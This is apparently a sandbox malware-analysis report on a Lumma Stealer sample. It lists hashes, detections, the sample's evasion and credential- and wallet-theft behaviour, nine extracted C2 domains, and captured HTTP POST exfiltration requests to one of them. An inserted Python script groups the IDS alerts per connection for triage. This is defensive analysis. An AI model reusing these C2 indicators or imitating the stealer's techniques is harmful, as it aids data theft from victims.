
Windows Analysis Report
cFLK1CiiNK.exe

Overview

General Information

Sample name: cFLK1CiiNK.exe (renamed because the original name is a hash value)
Original sample name: a95fc73c07c7d57256de64b06e73a6cd.exe
Analysis ID: 1581235
MD5: a95fc73c07c7d57256de64b06e73a6cd
SHA1: b5b823520691853414948ed9b962e3cf886b868c
SHA256: 540319216f35894c8d8252208fb9d8aa9414f9805d7ce0bf3c674c0dfafedb4c
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cFLK1CiiNK.exe (PID: 3592 cmdline: "C:\Users\user\Desktop\cFLK1CiiNK.exe" MD5: A95FC73C07C7D57256DE64B06E73A6CD)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (extracted): {"C2 url": ["appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Yara matches

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1400622014.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.1401111547.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: cFLK1CiiNK.exe PID: 3592 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: cFLK1CiiNK.exe PID: 3592 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: cFLK1CiiNK.exe PID: 3592 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security
                No Sigma rule has matched
Suricata alerts (all flows 192.168.2.7 -> 172.67.165.185:443, TCP)

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T08:56:44.521401+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:45.229985+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:45.229985+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:46.514354+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:47.295254+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:47.295254+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:49.148046+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:51.390512+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:53.681437+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:56.621880+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49715 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:57.398383+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49715 | 172.67.165.185 | 443 | TCP
2024-12-27T08:56:59.258103+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49723 | 172.67.165.185 | 443 | TCP
2024-12-27T08:57:03.029746+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49736 | 172.67.165.185 | 443 | TCP
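The thirteen alerts above come from five rules firing on eight client connections, and the severity-3 JA3 hit and the severity-1 Lumma hits land on the same client ports. The Python below is an added example (not Joe Sandbox or Suricata code) that groups the alerts by 5-tuple so each connection gets a single verdict: the alert rows are transcribed from the table, the rule names from the report's Networking section, while the stage labels and their ranking are this example's own assumptions.

```python
"""
Group the report's Suricata alerts into one verdict per flow.

Added example, not Joe Sandbox or Suricata code. ALERTS is transcribed from the
report's alert table and RULE_NAMES from its Networking section; the stage labels
in STAGE_BY_SID and their ranking are assumptions made for this example.
"""
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Alert:
    ts: str          # timestamp as printed in the report
    sid: int
    severity: int    # Suricata priority: 1 is the most severe
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


RULE_NAMES = {
    2028371: "ET JA3 Hash - Possible Malware - Fake Firefox Font Update",
    2049836: "ET MALWARE Lumma Stealer Related Activity",
    2049812: "ET MALWARE Lumma Stealer Related Activity M2",
    2054653: "ET MALWARE Lumma Stealer CnC Host Checkin",
    2048094: "ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration",
}

# Assumed mapping of SIDs onto kill-chain stages (this example's labels, not rule metadata).
STAGE_BY_SID = {
    2028371: "tls-fingerprint",
    2049836: "checkin", 2049812: "checkin", 2054653: "checkin",
    2048094: "exfiltration",
}
STAGE_RANK = {"tls-fingerprint": 0, "checkin": 1, "exfiltration": 2}

ALERTS = [Alert(*row) for row in (
    ("2024-12-27T08:56:44.521401+0100", 2028371, 3, "192.168.2.7", 49699, "172.67.165.185", 443),
    ("2024-12-27T08:56:45.229985+0100", 2054653, 1, "192.168.2.7", 49699, "172.67.165.185", 443),
    ("2024-12-27T08:56:45.229985+0100", 2049836, 1, "192.168.2.7", 49699, "172.67.165.185", 443),
    ("2024-12-27T08:56:46.514354+0100", 2028371, 3, "192.168.2.7", 49700, "172.67.165.185", 443),
    ("2024-12-27T08:56:47.295254+0100", 2054653, 1, "192.168.2.7", 49700, "172.67.165.185", 443),
    ("2024-12-27T08:56:47.295254+0100", 2049812, 1, "192.168.2.7", 49700, "172.67.165.185", 443),
    ("2024-12-27T08:56:49.148046+0100", 2028371, 3, "192.168.2.7", 49701, "172.67.165.185", 443),
    ("2024-12-27T08:56:51.390512+0100", 2028371, 3, "192.168.2.7", 49703, "172.67.165.185", 443),
    ("2024-12-27T08:56:53.681437+0100", 2028371, 3, "192.168.2.7", 49709, "172.67.165.185", 443),
    ("2024-12-27T08:56:56.621880+0100", 2028371, 3, "192.168.2.7", 49715, "172.67.165.185", 443),
    ("2024-12-27T08:56:57.398383+0100", 2048094, 1, "192.168.2.7", 49715, "172.67.165.185", 443),
    ("2024-12-27T08:56:59.258103+0100", 2028371, 3, "192.168.2.7", 49723, "172.67.165.185", 443),
    ("2024-12-27T08:57:03.029746+0100", 2028371, 3, "192.168.2.7", 49736, "172.67.165.185", 443),
)]


@dataclass
class FlowVerdict:
    src_port: int
    first_seen: str
    min_severity: int
    sids: list = field(default_factory=list)   # in the order they fired
    stage: str = "tls-fingerprint"             # furthest stage reached on this flow


def correlate(alerts):
    """Key alerts by (src_ip, src_port, dst_ip, dst_port) so one TCP connection gets one verdict."""
    flows = {}
    for a in sorted(alerts, key=lambda a: a.ts):   # stable sort: equal timestamps keep input order
        key = (a.src_ip, a.src_port, a.dst_ip, a.dst_port)
        if key not in flows:
            flows[key] = FlowVerdict(a.src_port, a.ts, a.severity)
        v = flows[key]
        v.min_severity = min(v.min_severity, a.severity)
        if a.sid not in v.sids:
            v.sids.append(a.sid)
        stage = STAGE_BY_SID.get(a.sid, "tls-fingerprint")
        if STAGE_RANK[stage] > STAGE_RANK[v.stage]:
            v.stage = stage
    return flows


def triage(flows):
    """Flows that reached severity 1, oldest first; JA3-only flows stay in `flows` as context."""
    return sorted((v for v in flows.values() if v.min_severity == 1), key=lambda v: v.first_seen)


def describe(v):
    rules = "; ".join(f"{sid} {RULE_NAMES.get(sid, '?')}" for sid in v.sids)
    return f"port {v.src_port} @ {v.first_seen}: {v.stage} (severity {v.min_severity}) [{rules}]"


if __name__ == "__main__":
    for verdict in triage(correlate(ALERTS)):
        print(describe(verdict))
```

Run as a script it prints three lines, one each for ports 49699 and 49700 (check-in) and 49715 (exfiltration); the five JA3-only connections are kept but not escalated, which is the point of collapsing per flow rather than counting raw alerts.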


AV Detection

Source: cFLK1CiiNK.exe | Avira: detected
Source: https://mindhandru.buzz/ts | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/; | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/k | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz:443/apiz | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/mm | Avira URL Cloud: Label: malware
Source: https://mindhandru.buzz/apib | Avira URL Cloud: Label: malware
Source: cFLK1CiiNK.exe.3592.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "hummskitnj.buzz", "mindhandru.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "scentniej.buzz"], "Build id": "PsFKDg--pablo"}
Source: cFLK1CiiNK.exe | ReversingLabs: Detection: 57%
Source: cFLK1CiiNK.exe | Virustotal: Detection: 53%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: cFLK1CiiNK.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.1278904734.0000000005260000.00000004.00001000.00020000.00000000.sdmp | String decryptor:
    hummskitnj.buzz
    cashfuzysao.buzz
    appliacnesot.buzz
    screwamusresz.buzz
    inherineau.buzz
    scentniej.buzz
    rebuildeso.buzz
    prisonyfork.buzz
    mindhandru.buzz
    lid=%s&j=%s&ver=4.0
    TeslaBrowser/5.5
    - Screen Resoluton:
    - Physical Installed Memory:
    Workgroup: -
    PsFKDg--pablo
Source: cFLK1CiiNK.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49723 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49715 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.165.185:443
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Malware configuration extractor | URLs: mindhandru.buzz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Joe Sandbox View | IP Address: 172.67.165.185
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49715 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49736 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.165.185:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 172.67.165.185:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=PNPROZ0RYU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12796
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=EDFZHD0QP9Z0339
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15058
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=G4BWS4NU6UPZBKO
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20383
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=28X9CBWL
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1159
    Host: mindhandru.buzz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=NQADJPVE510BPD
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 552698
    Host: mindhandru.buzz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mindhandru.buzz
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mindhandru.buzz
Source: cFLK1CiiNK.exe, 00000000.00000003.1372316289.0000000005D64000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
    http://crl.rootca1.amazontrust.com/rootca1.crl0
    http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
    http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    http://crt.rootca1.amazontrust.com/rootca1.cer0?
    http://ocsp.digicert.com0
    http://ocsp.rootca1.amazontrust.com0:
    http://x1.c.lencr.org/0
    http://x1.i.lencr.org/0
Source: cFLK1CiiNK.exe, 00000000.00000003.1424471508.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1324894763.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1401111547.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1400622014.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1480579154.0000000001716000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1480191552.00000000016F8000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1424818548.00000000016F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    http://crl.micro
Source: cFLK1CiiNK.exe, 00000000.00000003.1327171137.0000000005D7F000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.1327315647.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.1327393874.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    https://ac.ecosia.org/autocomplete?q=
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    https://duckduckgo.com/ac/?q=
    https://duckduckgo.com/chrome_newtab
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    https://www.ecosia.org/newtab/
    https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: cFLK1CiiNK.exe, 00000000.00000003.1373848511.0000000001746000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory:
    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
    https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: cFLK1CiiNK.exe, 00000000.00000003.1480463995.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory:
    https://mindhandru.buzz/
Source: cFLK1CiiNK.exe, 00000000.00000002.1482650272.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1480139826.000000000173D000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1481039564.000000000173D000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory:
    https://mindhandru.buzz/;
    https://mindhandru.buzz/d
    https://mindhandru.buzz/k
Source: cFLK1CiiNK.exe, 00000000.00000003.1371685116.0000000005D38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory:
    https://mindhandru.buzz/api
Source: cFLK1CiiNK.exe, 00000000.00000003.1480191552.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1482281782.00000000016E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    https://mindhandru.buzz/apib
Source: cFLK1CiiNK.exe, 00000000.00000003.1324752204.00000000016A2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    https://mindhandru.buzz/mm
Source: cFLK1CiiNK.exe, 00000000.00000003.1424733515.000000000173D000.00000004.00000020.00020000.00000000.sdmp | Strings found in binary or memory:
    https://mindhandru.buzz/pi
    https://mindhandru.buzz/ts
Source: cFLK1CiiNK.exe, 00000000.00000002.1484422809.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.1480463995.0000000005D42000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000003.1442422069.0000000005D42000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory:
    https://mindhandru.buzz:443/api
Source: cFLK1CiiNK.exe, 00000000.00000003.1480579154.000000000171F000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1424818548.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000002.1482554233.000000000171F000.00000004.00000020.00020000.00000000.sdmp, 00000000.00000003.1424471508.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory:
    https://mindhandru.buzz:443/apiz
Source: cFLK1CiiNK.exe, 00000000.00000003.1373462256.0000000005E5B000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory:
    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
    https://support.mozilla.org/products/firefoxgro.all
    https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
    https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
    https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
    https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
    https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.7:49723 version: TLS 1.2

                System Summary

                Source: cFLK1CiiNK.exe | Static PE information: section name:
                Source: cFLK1CiiNK.exe | Static PE information: section name: .idata
                Source: cFLK1CiiNK.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Code function: 0_3_016F9C7F
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Code function: 0_3_0172944B
                Source: cFLK1CiiNK.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: cFLK1CiiNK.exe | Static PE information: Section: ZLIB complexity 0.9995468239379085
                Source: cFLK1CiiNK.exe | Static PE information: Section: yrxjmqat ZLIB complexity 0.9950601942848503
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: cFLK1CiiNK.exe, 00000000.00000003.1327916499.0000000005D4E000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1327642087.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp, cFLK1CiiNK.exe, 00000000.00000003.1351072079.0000000005D6A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: cFLK1CiiNK.exe | ReversingLabs: Detection: 57%
                Source: cFLK1CiiNK.exe | Virustotal: Detection: 53%
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | File read: C:\Users\user\Desktop\cFLK1CiiNK.exe
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: webio.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exe | Section loaded: dnsapi.dll
